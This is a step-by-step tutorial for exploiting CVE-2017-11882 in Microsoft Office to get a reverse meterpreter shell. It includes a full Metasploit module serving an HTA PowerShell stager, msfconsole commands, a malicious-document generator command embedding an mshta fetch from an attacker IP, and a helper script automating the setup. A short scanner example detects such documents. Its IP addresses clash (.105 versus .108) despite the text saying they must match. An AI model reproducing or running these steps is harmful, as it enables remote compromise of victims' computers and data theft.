Office exploit - get shell

Environment:
Kali system, Windows system
Process:
Generate the exploit file on the Kali system and have Kali listen on a local port; when the DOC file is opened on the Windows system, a vulnerable Windows host is compromised.
The first method, suitable for testing:
Clone the code from GitHub:
git clone https://github.com/ridter/cve-2017-11882
Run the following in the cloned directory to generate a doc in the current directory:
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o Test.doc
This writes a Test.doc file; if a vulnerable computer opens the file, a calculator pops up.
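Before sending a generated document anywhere it is worth confirming what is actually inside it. The following scanner is an added example, not code from the page or from the Ridter project: it assumes the generator writes an RTF body (despite the .doc name) with the Equation Editor object carried in a \objdata hex blob, hex-decodes every such blob, flags objects that carry Equation.3 markers, and extracts any launcher command (cmd.exe, mshta, powershell, ...) embedded in them. The fixture built by make_sample_rtf is constructed here for offline testing and is not a working exploit.

```python
import binascii
import re
import sys

# Strings that identify an embedded Equation Editor (Equation.3) object.
# The last entry is the Equation Editor CLSID {0002CE02-0000-0000-C000-000000000046}
# in the little-endian byte order used inside OLE object headers.
EQUATION_MARKERS = (
    b"Equation.3",
    b"Equation Native",
    bytes.fromhex("02ce020000000000c000000000000046"),
)

# Launcher names worth reporting when they appear inside the object data,
# followed by whatever argument text runs up to the next NUL byte.
COMMAND_RE = re.compile(
    rb"(?i)\b(?:cmd(?:\.exe)?|mshta(?:\.exe)?|powershell(?:\.exe)?|"
    rb"rundll32|regsvr32|certutil|wscript|cscript)\b[^\x00]{0,200}"
)

# Hex blob that follows the \objdata control word; it ends at the closing brace.
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")


def extract_objects(rtf: bytes) -> list:
    """Decode every \\objdata hex blob in an RTF file into raw bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]  # tolerate a truncated trailing nibble
        blobs.append(binascii.unhexlify(hexstr))
    return blobs


def triage(data: bytes) -> dict:
    """Report embedded Equation Editor objects and any command text inside them."""
    report = {
        "is_rtf": data.lstrip().startswith(b"{\\rtf"),
        "objects": [],
        "suspicious": False,
    }
    if not report["is_rtf"]:
        return report  # a real OLE2 .doc (D0 CF 11 E0 magic) needs an OLE parser instead
    for blob in extract_objects(data):
        entry = {
            "equation_editor": any(marker in blob for marker in EQUATION_MARKERS),
            "commands": [m.group(0).decode("latin-1") for m in COMMAND_RE.finditer(blob)],
        }
        report["objects"].append(entry)
        # An Equation.3 object by itself is legitimate (old equations); one that
        # carries a shell command is what the generator above produces.
        if entry["equation_editor"] and entry["commands"]:
            report["suspicious"] = True
    return report


def make_sample_rtf(command: bytes) -> bytes:
    """Constructed fixture (not a working exploit): an RTF with an Equation.3
    object whose data holds a class name, the stream name and a command,
    which is enough to exercise the scanner offline."""
    class_name = b"Equation.3\x00"
    blob = (
        b"\x01\x05\x00\x00"  # OLE1 object header version field
        + b"\x02\x00\x00\x00"  # format id: embedded object
        + len(class_name).to_bytes(4, "little") + class_name
        + b"\x00" * 8
        + b"Equation Native\x00"
        + b"\x00" * 16
        + command + b"\x00"
        + b"\x00" * 8
    )
    return (
        b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}"
        b"{\\*\\objdata " + binascii.hexlify(blob) + b"}}}"
    )


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else make_sample_rtf(b"mshta http://192.168.0.108/aaaa")
    print(triage(data))
```

Run it as python scan.py Test.doc to see the extracted command; a file that starts with the OLE2 magic instead of {\rtf is reported as not RTF rather than silently passed.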
The second method, getting a reverse shell:
Kali System Preparation:
Save the following Ruby code as /usr/share/metasploit-framework/modules/exploits/windows/smb/cve_2017_11882.rb (mind the indentation):
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Office Payload Delivery',
      'Description'    => %q{
        This module generates a command to place within a Word document
        that, when executed, retrieves an HTA payload via HTTP from a web
        server. It does not generate the document itself.
      },
      'License'        => MSF_LICENSE,
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
        ],
      'DefaultTarget'  => 0,
    ))
  end

  # Serve the HTA (PowerShell stager) whenever the victim's mshta.exe fetches the URI.
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  # Called once the HTTP server is up: prints the exact command to embed in the document.
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end
Start the PostgreSQL service that MSF uses:
service postgresql start
Then start MSF:
sudo msfconsole
Reload all modules so the new file is picked up:
reload_all
Find the cve_2017_11882 module we just created:
search cve_2017_11882
Load the module, select a reverse-connect payload, set the local address (LHOST) and the URI path, and start it:
use exploit/windows/smb/cve_2017_11882
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set URIPATH aaaa
exploit
The module's HTTP server listens on SRVHOST/SRVPORT (SRVPORT defaults to 8080); when exploit starts, the primer method prints the exact mshta command to embed, which is the safest thing to copy into the next step.
Generate the exploit file Test1.doc:
Use ifconfig to find the Kali machine's current IP, then run the following in the cloned project directory; it writes Test1.doc in the current directory:
python Command109b_CVE-2017-11882.py -c "mshta http://192.168.0.108/aaaa" -o Test1.doc
(The name aaaa must be exactly the URIPATH set in MSF and the host and port must be where the module's HTTP server listens; otherwise mshta fetches nothing.)
Open the generated Test1.doc on the Windows system and MSF returns a shell (a meterpreter session).
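The whole second method fails silently when the mshta URL in the document and the MSF settings disagree, so it is worth deriving both from one place. The helper below is an added example, not code from the page or from the Ridter or Metasploit projects; it assumes Metasploit's HttpServer mixin serves on SRVPORT 8080 unless told otherwise, and that Command109b_CVE-2017-11882.py accepts a command of at most 109 bytes, as its name suggests. It emits an msfconsole resource script for the set/exploit steps above and the matching generator invocation, refusing commands that exceed the limit.

```python
# Assumptions (not from the page): Metasploit's HttpServer mixin uses SRVPORT 8080
# unless you set it, and the generator script Command109b_CVE-2017-11882.py takes
# a command of at most 109 bytes, as its name indicates. Addresses are placeholders.
COMMAND_LIMIT = 109


def mshta_command(host: str, srvport: int, uripath: str) -> str:
    """Build the mshta one-liner from the same values handed to MSF, so the URL
    cannot drift from URIPATH/SRVPORT. Port 80 is left implicit in the URL."""
    path = uripath.strip("/")
    authority = host if srvport == 80 else f"{host}:{srvport}"
    return f"mshta http://{authority}/{path}"


def fits(cmd: str, limit: int = COMMAND_LIMIT) -> bool:
    """True when the command fits the generator's byte limit (counted as ASCII)."""
    return len(cmd.encode("ascii", "strict")) <= limit


def msf_resource(lhost: str, lport: int, srvport: int, uripath: str) -> str:
    """msfconsole resource script mirroring the set/exploit steps above;
    run it with: msfconsole -r cve_2017_11882.rc"""
    lines = [
        "use exploit/windows/smb/cve_2017_11882",
        "set payload windows/meterpreter/reverse_tcp",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        f"set SRVHOST {lhost}",
        f"set SRVPORT {srvport}",
        f"set URIPATH {uripath.strip('/')}",
        "exploit -j",
    ]
    return "\n".join(lines) + "\n"


def poc_argv(cmd: str, output: str = "Test1.doc") -> list:
    """Argument vector for the generator script; raises if the command is too long."""
    if not fits(cmd):
        raise ValueError(f"command is {len(cmd.encode('ascii'))} bytes, limit is {COMMAND_LIMIT}")
    return ["python", "Command109b_CVE-2017-11882.py", "-c", cmd, "-o", output]


if __name__ == "__main__":
    kali = "192.168.0.108"  # replace with the address ifconfig reports
    srvport = 80            # needs root (the page runs msfconsole with sudo); 8080 otherwise
    cmd = mshta_command(kali, srvport, "aaaa")
    with open("cve_2017_11882.rc", "w") as fh:
        fh.write(msf_resource(kali, 4444, srvport, "aaaa"))
    print(" ".join(poc_argv(cmd)))
```

If you keep the default SRVPORT, the URL gains a :8080 suffix and still fits comfortably under the limit; with a longer hostname or path the byte check is what tells you to switch to a shorter URIPATH rather than finding out from a document that never calls back.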
Related resources:
PoC project: https://github.com/Ridter/CVE-2017-11882/
Usage: python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
Source: http://www.cnblogs.com/diligenceday/
Enterprise Website: http://www.idrwl.com/
Open source blog: http://www.github.com/sqqihao